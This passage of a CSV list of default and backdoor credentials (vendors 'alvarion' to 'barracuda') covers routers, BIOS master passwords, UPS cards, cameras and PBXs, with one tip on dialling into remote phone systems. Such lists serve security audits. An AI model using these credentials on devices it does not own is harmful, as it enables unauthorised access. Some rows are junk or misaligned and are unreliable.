releases,,,,admin,,Web OS 5.2,\nalvarion,TE1088,All,192.168.1.1,(no username),installer,Admin,,\nalvarion,TE1088,All,192.168.1.1,(no username),public,User,,\nalvarion,WIXFBR-103X187,,,admin,admin,Admin,,\nambicom,WL1100B-AR,,192.168.1.1,,default,Admin,,\nambicom,WL151N-AR,,192.168.0.1,admin,admin,Admin,,\nambit,,,,admin,cableroot,root,,\nambit,ADSL,,,root,,,,\nambit,ADSL,,Admin,root,,,,\nambit,ADSL,,Telnet,root,,Admin,,\nambit,Cable Modem 60678eu,,1.12,root,root,,,\nambit,Cable Modem 60678eu,1.12,Multi,root,root,Admin,,\nambit,Cable Modem,,,root,root,,,\nambit,Cable Modem,,Multi,root,root,Admin,Time Warner Cable issued modem,\nambit,Cable Modem,,Multi,user,user,,,\nambit,DOCSIS 1.0/1.1/2.0 Compliant,5.66.1011,,user,,user,,\nambit,ntl:home 200,2.67.1011,HTTP,root,root,Admin,This is the cable modem supplied by NTL in the UK,\nami bios,1999,,AT 49,,,,,\nami,PC BIOS,,,,AMI.KEY,,,\nami,PC BIOS,,,,AMISETUP,,,\nami,PC BIOS,,Admin,,A.M.I,,,\nami,PC BIOS,,Admin,,AM,,,\nami,PC BIOS,,Admin,,AMI!SW,,,\nami,PC BIOS,,Admin,,AMI,,,\nami,PC BIOS,,Admin,,AMI.KEY,,,\nami,PC BIOS,,Admin,,AMI.KEZ,,,\nami,PC BIOS,,Admin,,AMI?SW,,,\nami,PC BIOS,,Admin,,AMIAMI,,,\nami,PC BIOS,,Admin,,AMIDECOD,,,\nami,PC BIOS,,Admin,,AMIPSWD,,,\nami,PC BIOS,,Admin,,AMISETUP,,,\nami,PC BIOS,,Admin,,AMI_SW,,,\nami,PC BIOS,,Admin,,AMI~,,,\nami,PC BIOS,,Admin,,BIOSPASS,,,\nami,PC BIOS,,Admin,,HEWITT RAND,,,\nami,PC BIOS,,Admin,,aammii,,,\nami,PC BIOS,,Console,,A.M.I,Admin,,\nami,PC BIOS,,Console,,AAAMMMIII,Admin,,\nami,PC BIOS,,Console,,AM,Admin,,\nami,PC BIOS,,Console,,AMI!SW,Admin,,\nami,PC BIOS,,Console,,AMI,Admin,,\nami,PC BIOS,,Console,,AMI.KEY,Admin,,\nami,PC BIOS,,Console,,AMI.KEZ,Admin,,\nami,PC BIOS,,Console,,AMI?SW,Admin,,\nami,PC BIOS,,Console,,AMIAMI,Admin,,\nami,PC BIOS,,Console,,AMIDECOD,Admin,,\nami,PC BIOS,,Console,,AMIPSWD,Admin,,\nami,PC BIOS,,Console,,AMISETUP,Admin,,\nami,PC BIOS,,Console,,AMI_SW,Admin,,\nami,PC BIOS,,Console,,AMI~,Admin,,\nami,PC BIOS,,Console,,BIOS,Admin,,\nami,PC BIOS,,Console,,BIOSPASS,Admin,,\nami,PC BIOS,,Console,,CMOSPWD,Admin,,\nami,PC BIOS,,Console,,CONDO,Admin,,\nami,PC BIOS,,Console,,HEWITT RAND,Admin,,\nami,PC BIOS,,Console,,LKWPETER,Admin,,\nami,PC BIOS,,Console,,MI,Admin,,\nami,PC BIOS,,Console,,Oder,Admin,,\nami,PC BIOS,,Console,,PASSWORD,Admin,,\nami,PC BIOS,,Console,,aammii,Admin,,\nami,at 49,,,,,,,\namigo,ADSL Router,,,admin,epicrouter,,,\namigo,BRB72n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRC70n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRC76n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRD70n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRE70n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRF70n,router,192.168.1.1,admin,admin,Admin,,\namino,AmiNET Set Top Box,,,,leaves,,,\namino,AmiNET Set Top Box,,,,snake,,,\namit,BDW463AM,router,192.168.123.254,admin,admin,Admin,,\namit,CDD531AM U02,modem,192.168.123.254,admin,admin,Admin,,\namit,CDE530AM,router,192.168.123.254,admin,admin,Admin,,\namit,CDE570AM,router,192.168.123.254,admin,admin,Admin,,\namit,CDM530AM,router,192.168.123.254,,admin,Admin,,\namit,CDM531AM,hotspot,192.168.123.254,,admin,Admin,,\namit,CDM532AM-001,router,192.168.123.254,,admin,Admin,,\namit,CDW531AM,router,192.168.123.254,,admin,Admin,,\namit,CDW68AAM-U01,router,192.168.123.254,,admin,Admin,,\namit,WIMQ137AM,router,192.168.123.254,,admin,Admin,,\namit,WIP-301,router,192.168.123.254,,admin,Admin,,\namit,WIP181AM,router,192.168.123.254,,admin,Admin,,\namitech,wireless router and access point 802.11g 802.11b,any,HTTP,admin,admin,Admin,Web interface is on 192.168.1.254 available on the LAN ports of the AP.,\nampedwireless,AP20000G,router,192.168.80.240,admin,admin,2016-10-30,,\nampedwireless,AP300,AP,192.168.1.240,,,2016-10-30,,\nampedwireless,AP600EX,AP,192.168.1.240,,,2016-10-30,,\nampedwireless,R10000,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,R10000G,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,R20000G,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,REC10,repeater,192.168.1.240,,,2016-10-30,,\nampedwireless,RTA15,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,SR10000,repeater,192.168.1.240,admin,admin,2016-10-30,,\nampedwireless,SR20000G,repeater,192.168.1.240,admin,admin,2016-10-30,,\nampedwireless,SR300,repeater,192.168.1.240,,,2016-10-30,,\namptron,PC BIOS,,,,Polrty,,,\namptron,PC BIOS,,Admin,,Polrty,,,\namptron,PC BIOS,,Console,,Polrty,Admin,,\namx,CSG,,,admin,1988,,,\namx,Endeleo UDM-0102,,,,admin,,,\namx,Endeleo UDM-0404,,,,admin,,,\namx,Endeleo UDM-0808-SIG,,,administrator,password,,,\namx,Environmental Controls ENV-VST-C,,,,1988,,,\namx,IS-SPX-1000,,,,,,,\namx,MAX Server,,,root,mozart,,,\namx,MAX-CSD10,,,administrator,password,,,\namx,MET-ECOM\\=D,,,admin,1988,,,\namx,NI Series,,,NetLinx,password,,,\namx,NI Series,,,administrator,password,,,\namx,NXA-ENET24,,,Admin,1988,,,\namx,NXA-ENET24,,,guest,guest,,,\namx,NXA-ENET8POE,,,admin,1988,,,\namx,NXA-WAP200G,,192.168.1.240,admin,1988,Admin,,\namx,NXA-WAP250G,,,admin,1988,,,\namx,NXA-WAP250G,,192.168.1.240,admin,1988,Admin,,\nandover controls,Infinity,,any,acc,acc,,,\nandovercontrols,Infinity,any,Console,acc,acc,Admin,Building managment system,\nanker,Uspeed,300Mbps dual band router,192.168.0.1,admin,admin,Admin,SSID is Wireless or Wireless(5G),\nanker,Uspeed,600Mbps dual band router,192.168.0.1,admin,admin,Admin,SSID is Anker N600 2.4G or Anker N600 5G,\naoc,zenworks 4.0,,Multi,,admin,Admin,,\naopen,!OI-891,,192.168.1.1,admin,admin,Admin,,\napache project,,,Apache,jj,,,,\napache,TomCat,,HTTP,admin,admin,,,\napache,TomCat,,HTTP,admin,tomcat,,,\napache,TomCat,,HTTP,role,changethis,,,\napache,TomCat,,HTTP,role1,role1,,,\napache,TomCat,,HTTP,root,changethis,,,\napache,TomCat,,HTTP,root,root,,,\napache,TomCat,,HTTP,tomcat,changethis,,,\napache,TomCat,,HTTP,tomcat,tomcat,,,\napache,Tomcat,,,admin,tomcat,,,\napache,Tomcat,,,role,changethis,,,\napache,Tomcat,,,role1,role1,,,\napache,Tomcat,,,root,changethis,,,\napache,Tomcat,,,tomcat,tomcat,,,\napache,jboss4,,jmx-console,admin,jboss4,,,\napc,9606 Smart Slot,,,,backdoor,,,\napc,9606 Smart Slot,,Telnet,,backdoor,Admin,,\napc,9606 Smart Slot,AOS 3.2.1 and AOS 3.0.3,Telnet,(any),TENmanUFactOryPOWER,,,\napc,AP9606 SmartSlot Web/SNMP Management Card,,AOS 3.2.1 and AOS 3.0.3,(any),TENmanUFactOryPOWER,,,\napc,AP9606,,,apc,apc,Admin,,\napc,Any,,,apcuser,apc,,,\napc,Call-UPS,,AP9608,,serial number of the Call-UPS,,,\napc,Call-UPS,AP9608,Console,,(Device Serial Number),Admin,,\napc,Galagy 5000,,Browser,MGEUPS,MGEUPS,,,\napc,MasterSwitch,,AP9210,apc,apc,,,\napc,MasterSwitch,AP9210,,apc,apc,Admin,,\napc,PowerChute Bussiness Edition,,Installed program,Pingo,Ura,Admin access,,\napc,Powerchute Plus,,4.x for Netware 3.x/4.x,POWERCHUTE,APC,,,\napc,Powerchute Plus,4.x for Netwware 3.x/4.x,Console,POWERCHUTE,APC,Admin,,\napc,SNMP Adapter,,2.x,apc,apc,,,\napc,SNMP Adapter,2.x,,apc,apc,,,\napc,Share-UPS,,AP9207,,serial number of the Share-UPS,,,\napc,Share-UPS,AP9207,Console,,(Device Serial Number),Admin,,\napc,Smart UPS,,Multi,apc,apc,Admin,,\napc,Smartups 3000,,HTTP,apc,apc,Admin,,\napc,Smartups 5000,,HTTP,apc,apc,admin,,\napc,UPS Network Management Card 2,,,device,apc,,,\napc,UPS Network Management Card 2,,,readonly,apc,,,\napc,UPS,,,apc,apc,,,\napc,UPS,,Admin,apc,apc,,,\napc,UPS,,Telnet,apc,apc,Admin,,\napc,UPSes (Web/SNMP Mgmt Card),,HTTP,device,device,Admin,Secondary access account (next to apc/apc),\napc,USV Network Management Card,,,,TENmanUFactOryPOWER,,,\napc,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER ,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase,\napc,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase,\napc,Web/SNMP Management Card,,AP9606,apc,apc,,,\napple computer,Airport,,,,public,,,\napple computer,Network Assistant,,,,xyzzy,,,\napple computer,Remote Desktop,,,,xyzzy,,,\napple,A1034,,10.0.1.1,,,Admin,,\napple,AirPort Base Station (Graphite),,2,,public,,,\napple,AirPort Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details,\napple,Airport Base Station (Dual Ethernet),,2,,password,,,\napple,Airport Base Station (Dual Ethernet),2,Multi,,password,Guest,See Apple article number 106597 for details,\napple,Airport Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details,\napple,Airport Extreme Base Station,,2,,admin,,,\napple,Airport Extreme Base Station,2,Multi,,admin,Guest,see Apple article number 107518 for details,\napple,Airport,,,,public,,1.1,\napple,Airport,,Administrative,admin,public,,,\napple,Airport,,Other,admin,public,Administrative,,\napple,Airport,5,1.0.09,Multi,root,admin,,\napple,Airport,5,1.0.09,Multi,root,admin,192.168.1.1,\napple,Airport,Express,10.0.0.1,,,,,\napple,Airport,Extreme,10.0.1.1,,public,,,\napple,Airport,Graphite,192.42.249.13,(no username),public,User,,\napple,AppleTV,2,ssh,root,alpine,root,,\napple,Jailbroken iPad/iPhone,4.3.0+,SSH,root,alpine,root,Only on jailbroken iDevices.,\napple,Network Assistant,,,,xyzzy,Admin,3.X,\napple,Network Assistant,,,None,xyzzy,Admin,3.X,\napple,Remote Desktop,,,,xyzzy,Admin,,\napple,iPhone,,,mobile,dottie,,,\napple,iPhone,,,root,alpine,,,\napple,iPod Touch,,,root/mobile,alpine,,,\narcor,Easybox,all,http://192.168.2.1,root,123456,Root,,\narcwireless,FreeStation 5 AP,,192.168.10.1,admin,admin,Admin,SSID is arcweb,\nareca,RAID controllers,,Console,admin,0,Admin,,\narescom,modem/router ,10XX,Telnet,,atc123,Admin,,\narescom,modem/router,10XX,Telnet,,atc123,Admin,,\narlotto,SG205,,HTTP,admin,123456,https://192.168.2.1,,\narlotto,SG205,,https://192.168.2.1,admin,123456,,,\narmenia,Forum,,No,admin,admin,,,\narris,TG852G,All,192.168.100.1,admin,password,Admin,,\narris,Touchstone Gateway,,,admin,password,,,\narrowpoint,Any,,,admin,system,Admin,,\narrowpoint,Unknown,,,,,,,\narrowpoint,Unknown,,,admin,system,,,\narrowpoint,Various,,,,,Admin,,\narrowpoint,windows xp,all,192.168.0.1,admin,arrowpoint,,,\nartem,ComPoint - CPD-XT-b,CPD-XT-b,Telnet,,admin,Admin,,\nasante,FM2008,,Multi,admin,asante,Admin,,\nasante,FM2008,,Telnet,superuser,,Admin,,\nasante,FM2008,01.06,Telnet,superuser,asante,Admin,,\nasante,FM2008,1.06,Telnet,superuser,asante,Admin,,\nasante,IntraStack,,,IntraStack,Asante,,,\nasante,IntraStack,,Admin,IntraStack,Asante,,,\nasante,IntraStack,,multi,IntraStack,Asante,Admin,,\nasante,IntraSwitch,,,IntraSwitch,Asante,,,\nasante,IntraSwitch,,Admin,IntraSwitch,Asante,,,\nasante,IntraSwitch,,multi,IntraSwitch,Asante,Admin,,\nascend,All TAOS models,,,admin,Ascend,,all,\nascend,Router,,,,ascend,,,\nascend,Router,,Admin,,ascend,,,\nascend,Router,,Telnet,,ascend,Admin,,\nascend,Sahara,,,root,ascend,,,\nascend,Sahara,,Multi,root,ascend,,,\nascend,Yurie,,,readonly,lucenttech2,,,\nascend,Yurie,,,readwrite,lucenttech1,,,\nascend,Yurie,,Multi,readonly,lucenttech2,,,\nascend,Yurie,,Multi,readwrite,lucenttech1,,,\nascom,Ascotel PBX,,ALL,,3ascotel,,,\nascom,Ascotel PBX,ALL,Multi,,3ascotel,Admin,,\nascom,Ascotel,,,,3ascotel,,,\nasdsa,sadsa,,asdsad,12321,sadsad,,,\nasmack,router,ar804u,HTTP,admin,epicrouter,Admin,,\nasmax,AR701u / ASMAX AR6024,,HTTP,admin,epicrouter,Admin,,\nasmax,AR800C2,,HTTP,admin,epicrouter,Admin,,\nasmax,Ar-804u,,HTTP,admin,epicrouter,Admin,,\naspect,ACD,,6,DTA,TJM,,,\naspect,ACD,,6,customer,,,,\naspect,ACD,,7,DTA,TJM,,,\naspect,ACD,,8,DTA,TJM,,,\naspect,ACD,,User,DTA,TJM,,,\naspect,ACD,,User,customer,,,,\naspect,ACD,6,HTTP,customer,,User,views error logs,\naspect,ACD,6,Oracle,DTA,TJM,User,,\naspect,ACD,7,Oracle,DTA,TJM,User,,\naspect,ACD,8,Oracle,DTA,TJM,User,,\nast,PC BIOS,,,,SnuFG5,,,\nast,PC BIOS,,Admin,,SnuFG5,,,\nast,PC BIOS,,Console,,SnuFG5,Admin,,\nast,Powerexec 4/25sl,,Multi,,,Admin,,\nast,powerexec 4/25sl,,,,,,,\nast,powerexec 4/25sl,,Admin,,,,,\nasus,6310EV,,,adsl,adsl1234,,,\nasus,6310EV,,Multi,adsl,adsl1234,,,\nasus,ACPIBIOS,,,,,,,\nasus,L3800,,,,,,,\nasus,P5P800,,Multi,,admin,User,,\nasus,RT-AC5300,,http://router.asus.com,admin,admin,admin,,\nasus,RT-N11,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N12,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N13,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N13U,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N15,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N16,,,admin,admin,,,\nasus,RT-N16,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N56U,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-300,All,HTTP,admin,admin,Admin,,\nasus,WL-330g,All,192.168.1.221,admin,admin,Admin,,\nasus,WL-500G Deluxe,,HTTP,admin,admin,Admin,,\nasus,WL-500G,,HTTP,admin,admin,Admin,,\nasus,WL-500G,1.7.5.6,HTTP,admin,admin,Admin,,\nasus,WL-500W,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-503G,All,HTTP,admin,admin,Admin,,\nasus,WL-520G,,192.168.1.1,admin,admin,Admin,,\nasus,WL-520G,,HTTP,admin,admin,Admin,,\nasus,WL-520GC,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-520GU,All,192.168.1.1,admin,,Admin,,\nasus,WL-600G,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-AM602,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-AM604g,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-HDD2.5,,,admin,admin,Admin,Default IP 192.168.1.220,\naszs,graphick,,jkl,Administrator,admin,,,\nat&,T,,mcp,Console,,,,\nat&t,3B2 Firmware,,,,mcp,,,\natcom,AG-168FC,,http://192.168.1.100,,12345678,Administration,,\natheros,AR5BAP-0030,,192.168.1.1,Admin,5up,Administration,,\natheros,AR5BAP-0032,,192.168.1.1,Admin,5up,Administration,,\natheros,AR5BAP-0033,,192.168.1.1,Admin,5up,Administration,,\natlantis,A02-RA141,,Multi,admin,atlantis,Admin,,\natlantis,I-Storm Lan Router ADSL ,,Multi,admin,atlantis,Admin,,\natlantis,I-Storm Lan Router ADSL,,Multi,admin,atlantis,Admin,,\natlantis,Web Share RB,Web Share RB,http://192.168.1.1,santus,marika,,,\natlassian,Crowd,,,Crowd,password,,,\natlassian,Crowd,,,Demo,password,,,\natlassian,Crowd,,,Username,password,,,\natlassian,Crowd,,,crowd­-openid-­server,password,,,\natt,3B2 Firmware,,Console,,mcp,Admin,,\natt,EP5962 2-Line Cordless Phone System,,by telephone,,5000,Mailbox access,,\natt,Starlan SmartHUB,,,N/A,manager,,9.9,\nattachmate,Attachmate Gateway,,,,PASSWORD,,,\nattachmate,Attachmate Gateway,,Console,,PASSWORD,Admin,,\naudioactive,MPEG Realtime Encoders,,,,telos,,,\naudioactive,MPEG Realtime Encoders,,Telnet,,telos,Admin,,\nautodesk,Autocad,,,autocad,autocad,,,\nautodesk,Autocad,,Multi,autocad,autocad,User,,\nautodesk,Autocad,,User,autocad,autocad,,,\navaya,4602 SIP Telephone,1.1.HTTP,admin,barney,,,,\navaya,CMS Supervisor,,11,root,cms500,,,\navaya,CMS Supervisor,11,Console,root,cms500,Admin,,\navaya,Cajun P33x,,Admin,,admin,,,\navaya,Cajun P33x,,firmware before 3.11.0,,admin,,,\navaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,,\navaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,check the Bugtraq archives for more information,\navaya,Cajun Pxxx,,,root,root,,,\navaya,Cajun Pxxx,,Admin,root,root,,,\navaya,Cajun Pxxx,,Multi,root,root,Admin,,\navaya,Cajun,,Admin,,,,,\navaya,Cajun,,Developer,diag,danger,,,\navaya,Cajun,,Developer,manuf,xxyyzz,,,\navaya,Cajun,,P550R P580 P880 and P882,diag,danger,,,\navaya,Cajun,,P550R P580 P880 and P882,manuf,xxyyzz,,,\navaya,Cajun,,P550R/P580/P880/P882,,,,,\navaya,Cajun,P550R P580 P880 and P882,Multi,diag,danger,Developer,,\navaya,Cajun,P550R P580 P880 and P882,Multi,manuf,xxyyzz,Developer,,\navaya,Cajun,P550R/P580/P880/P882,Telnet,,,Admin,,\navaya,Definity,,Admin,craft,,,,\navaya,Definity,,G3Si,craft,,,,\navaya,Definity,,Multi,dadmin,dadmin01,Admin,,\navaya,Definity,G3Si,Multi,craft,,Admin,,\navaya,IMD,,,admin,admin123,Admin,,\navaya,IP Office,500, 406,Default IP: 192.168.42.1, you can use ISDN modem to dial into remote systems- try last few numbers of ranges eg. xxxxxxxx99 or xxxxxxxx98, Administrator,Admin,\navaya,IP Office,500,Default IP: 192.168.42.1 - you can use ISDN modem to dial into remote systems- try last few numbers of ranges eg. xxxxxxxx99 or xxxxxxxx98,,Administrator,Administrator (default) - Older versions use \"\"password\"\",Downlaod Avaya management software from Avaya.com (free download) if you are on the same network as the phone system; open up manger and it will look for broadcasts from the system; select it and try the default u/p,\navaya,P330 Stackable Switch,,,root,root,,,\navaya,Pxxx,,5.2.14,diag,danger,,,\navaya,Pxxx,,5.2.14,manuf,xxyyzz,,,\navaya,Pxxx,,Admin,diag,danger,,,\navaya,Pxxx,,Admin,manuf,xxyyzz,,,\navaya,Pxxx,5.2.14,Multi,diag,danger,Admin,,\navaya,Pxxx,5.2.14,Multi,manuf,xxyyzz,Admin,,\navaya,Routers,Various,telnet,root,root,Admin,,\navaya,Scopia Gateway,,,admin,password,,,\navaya,Scopia,,,admin,admin,,,\navaya,definity,,Admin,craft,crftpw,,,\navaya,definity,,up to rev. 6,craft,crftpw,,,\navaya,definity,up to rev. 6,any,craft,crftpw,Admin,,\navaya,g3R,,Admin,root,ROOT500,,,\navaya,g3R,,v6,root,ROOT500,,,\navaya,g3R,v6,Console,root,ROOT500,Admin,,\navaya,g3si,,,,,,,\navaya,routers,,,root,root,,,\navenger news system (ans),ANS,,,,Administrative,,,\navengernewssystem,Avenger News System,,HTTP,,Administrative,,default string: admin:aaLR8vE.jjhss:root@127.0.0.1 pass file is located at ans_data/ans.passwd (relative to ans.pl location),\naward,6,,,,,,,\naward,6.00PG,,,,,,,\naward,BIOS,,,,lkwpeter,,,\naward,BIOS,,Admin,,lkwpeter,,,\naward,Bios,,6,,,,,\naward,PC BIOS,,,,1322222,,,\naward,PC BIOS,,,,SER,,,\naward,PC BIOS,,,AWARD_SW,,,,\naward,PC BIOS,,Admin,,01322222,,,\naward,PC BIOS,,Admin,,256256,,,\naward,PC BIOS,,Admin,,?award,,,\naward,PC BIOS,,Admin,,AWARD_SW,,,\naward,PC BIOS,,Admin,,BIOS,,,\naward,PC BIOS,,Admin,,CONCAT,,,\naward,PC BIOS,,Admin,,CONDO,,,\naward,PC BIOS,,Admin,,HELGA-S,,,\naward,PC BIOS,,Admin,,HEWITT RAND,,,\naward,PC BIOS,,Admin,,HLT,,,\naward,PC BIOS,,Admin,,PASSWORD,,,\naward,PC BIOS,,Admin,,SER,,,\naward,PC BIOS,,Admin,,SKY_FOX,,,\naward,PC BIOS,,Admin,,SWITCHES_SW,,,\naward,PC BIOS,,Admin,,SZYX,,,\naward,PC BIOS,,Admin,,Sxyz,,,\naward,PC BIOS,,Admin,,TTPTHA,,,\naward,PC BIOS,,Admin,,TzqF,,,\naward,PC BIOS,,Admin,,aLLy,,,\naward,PC BIOS,,Admin,,aPAf,,,\naward,PC BIOS,,Admin,,admin,,,\naward,PC BIOS,,Admin,,alfarome,,,\naward,PC BIOS,,Admin,,award,,,\naward,PC BIOS,,Admin,,awkward,,,\naward,PC BIOS,,Admin,,biosstar,,,\naward,PC BIOS,,Admin,,biostar,,,\naward,PC BIOS,,Admin,,g6PJ,,,\naward,PC BIOS,,Admin,,h6BB,,,\naward,PC BIOS,,Admin,,j09F,,,\naward,PC BIOS,,Admin,,j256,,,\naward,PC BIOS,,Admin,,j262,,,\naward,PC BIOS,,Admin,,j322,,,\naward,PC BIOS,,Admin,,j64,,,\naward,PC BIOS,,Admin,,lkw peter,,,\naward,PC BIOS,,Admin,,lkwpeter,,,\naward,PC BIOS,,Admin,,setup,,,\naward,PC BIOS,,Admin,,t0ch20x,,,\naward,PC BIOS,,Admin,,t0ch88,,,\naward,PC BIOS,,Admin,,wodj,,,\naward,PC BIOS,,Admin,,zbaaaca,,,\naward,PC BIOS,,Console,,(eight spaces),Admin,The password is eight spaces on some versions,\naward,PC BIOS,,Console,,01322222,Admin,,\naward,PC BIOS,,Console,,1322222,Admin,,\naward,PC BIOS,,Console,,256256,Admin,,\naward,PC BIOS,,Console,,589589,Admin,,\naward,PC BIOS,,Console,,589721,Admin,,\naward,PC BIOS,,Console,,595595,Admin,,\naward,PC BIOS,,Console,,598598,Admin,,\naward,PC BIOS,,Console,,?award,Admin,,\naward,PC BIOS,,Console,,ALFAROME,Admin,,\naward,PC BIOS,,Console,,ALLY,Admin,,\naward,PC BIOS,,Console,,ALLy,Admin,,\naward,PC BIOS,,Console,,AWARD PW,Admin,,\naward,PC BIOS,,Console,,AWARD SW,Admin,,\naward,PC BIOS,,Console,,AWARD?SW,Admin,,\naward,PC BIOS,,Console,,AWARD_PW,Admin,,\naward,PC BIOS,,Console,,AWARD_SW,Admin,,\naward,PC BIOS,,Console,,AWKWARD,Admin,,\naward,PC BIOS,,Console,,BIOS,Admin,,\naward,PC BIOS,,Console,,BIOSTAR,Admin,,\naward,PC BIOS,,Console,,CONCAT,Admin,,\naward,PC BIOS,,Console,,CONDO,Admin,,\naward,PC BIOS,,Console,,Condo,Admin,,\naward,PC BIOS,,Console,,HELGA-S,Admin,,\naward,PC BIOS,,Console,,HEWITT RAND,Admin,,\naward,PC BIOS,,Console,,HLT,Admin,,\naward,PC BIOS,,Console,,J256,Admin,,\naward,PC BIOS,,Console,,J262,Admin,,\naward,PC BIOS,,Console,,KDD,Admin,,\naward,PC BIOS,,Console,,LKWPETER,Admin,,\naward,PC BIOS,,Console,,Lkwpeter,Admin,,\naward,PC BIOS,,Console,,PASSWORD,Admin,,\naward,PC BIOS,,Console,,PINT,Admin,,\naward,PC BIOS,,Console,,SER,Admin,,\naward,PC BIOS,,Console,,SKY_FOX,Admin,,\naward,PC BIOS,,Console,,SWITCHES_SW,Admin,,\naward,PC BIOS,,Console,,SW_AWARD,Admin,,\naward,PC BIOS,,Console,,SXYZ,Admin,,\naward,PC BIOS,,Console,,SZYX,Admin,,\naward,PC BIOS,,Console,,Sxyz,Admin,,\naward,PC BIOS,,Console,,TTPTHA,Admin,,\naward,PC BIOS,,Console,,TzqF,Admin,,\naward,PC BIOS,,Console,,ZAAAADA,Admin,,\naward,PC BIOS,,Console,,ZAAADA,Admin,,\naward,PC BIOS,,Console,,ZBAAACA,Admin,,\naward,PC BIOS,,Console,,ZJAAADC,Admin,,\naward,PC BIOS,,Console,,_award,Admin,,\naward,PC BIOS,,Console,,aLLY,Admin,,\naward,PC BIOS,,Console,,aLLy,Admin,,\naward,PC BIOS,,Console,,aPAf,Admin,,\naward,PC BIOS,,Console,,admin,Admin,,\naward,PC BIOS,,Console,,alfarome,Admin,,\naward,PC BIOS,,Console,,award,Admin,,\naward,PC BIOS,,Console,,award.sw,Admin,,\naward,PC BIOS,,Console,,award_?,Admin,,\naward,PC BIOS,,Console,,award_ps,Admin,,\naward,PC BIOS,,Console,,awkward,Admin,,\naward,PC BIOS,,Console,,biosstar,Admin,,\naward,PC BIOS,,Console,,biostar,Admin,,\naward,PC BIOS,,Console,,condo,Admin,,\naward,PC BIOS,,Console,,d8on,Admin,,\naward,PC BIOS,,Console,,djonet,Admin,,\naward,PC BIOS,,Console,,efmukl,Admin,,\naward,PC BIOS,,Console,,g6PJ,Admin,,\naward,PC BIOS,,Console,,h6BB,Admin,,\naward,PC BIOS,,Console,,j09F,Admin,,\naward,PC BIOS,,Console,,j256,Admin,,\naward,PC BIOS,,Console,,j262,Admin,,\naward,PC BIOS,,Console,,j322,Admin,,\naward,PC BIOS,,Console,,j64,Admin,,\naward,PC BIOS,,Console,,kdd,Admin,,\naward,PC BIOS,,Console,,lkw peter,Admin,,\naward,PC BIOS,,Console,,lkwpeter,Admin,,\naward,PC BIOS,,Console,,lkwpeter,Admin,Note - After 1996-12-19 Award required each OEM to set their own password,\naward,PC BIOS,,Console,,pint,Admin,,\naward,PC BIOS,,Console,,setup,Admin,,\naward,PC BIOS,,Console,,sxyz,Admin,,\naward,PC BIOS,,Console,,t0ch20x,Admin,,\naward,PC BIOS,,Console,,t0ch88,Admin,,\naward,PC BIOS,,Console,,wodj,Admin,,\naward,PC BIOS,,Console,,zbaaaca,Admin,,\naward,PC BIOS,,Console,,zjaaadc,Admin,,\naward,award,,6,,,,,\naward,bios,,1.0A,,,,,\naward,bios,,4.6,admin,admin,,,\naward,v4.51PG,,Admin,,SY_MB,,,\naward,v4.51PG,,v4.51PG,,SY_MB,,,\naward,v4.51PG,v4.51PG,Multi,,SY_MB,Admin,,\naxent,NetProwler manager,,,administrator,admin,,WinNT,\naximcom,MR-102N,All,,admin,admin,Admin,,\naximcom,MR-105N,All,192.168.0.1,admin,admin,Admin,,\naximcom,MR-108N,All,192.168.1.1:8080,admin,admin,Admin,,\naximcom,PGP-108N,All,192.168.0.1,admin,admin,Admin,,\naxis,200 Network Camera,,,root,pass,,,\naxis,200 V1.32,,,admin,,,,\naxis,200+ Network Camera,,,root,pass,,,\naxis,2100 Network Camera,,,root,pass,,,\naxis,2110 Network Camera,,,root,pass,,,\naxis,2120 Network Camera,,,root,pass,,,\naxis,2420 Network Camera,,,root,pass,,,\naxis,540 Print Server,,Multi,root,pass,Admin,,\naxis,540+ Print Server,,Multi,root,pass,Admin,,\naxis,542 Print Server,,Multi,root,pass,Admin,,\naxis,All Axis Printserver,All,Multi,root,pass,Admin,,\naxis,NETCAM,,200/240,root,pass,,,\naxis,NETCAM,,Admin,root,pass,,,\naxis,NETCAM,200/240,,root,pass,,,\naxis,NETCAM,200/240,Telnet,root,pass,Admin,,\naxis,NPS 530,,,root,pass,,5.02,\naxis,StorPoint CD100,,,root,pass,,4.28,\naxis,StorPoint CDE100,,,root,pass,,,\naxis,StorPoint NAS 100,,,root,pass,,,\naxis,Webcams,,HTTP,root,pass,Admin,,\naxus,AXUS YOTTA,,Multi,,0,Admin,Storage DAS SATA to SCSI/FC,\naxway,SecureTransport,,,setup,setup,,,\naxway,synchronization gateway,,,admin,Secret1,Admin,,\naztech,DSL-3100R,,192.168.1.1,,,Admin,,\naztech,DSL-600E,,HTTP,admin,admin,Admin,,\naztech,DSL-600ER,,192.168.1.1,Admin,Admin,Admin,,\naztech,windows xp, all models,38.4.2,192.168.1.1,admin,admin,,\nbacktrack,backtrack 4,,CLI,root,toor,,,\nbarco,ClickShare,,,,clickshare,,,\nbarco,ClickShare,,,admin,admin,,,\nbarracuda,SSL VPN,,,admin,admin,,,\nbarracuda,SSL VPN,,,ssladmin,ssladmin,,,\nbarracudanetworks,Barracuda Spam Firewall 300,,http://:8000,admin,admin,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall 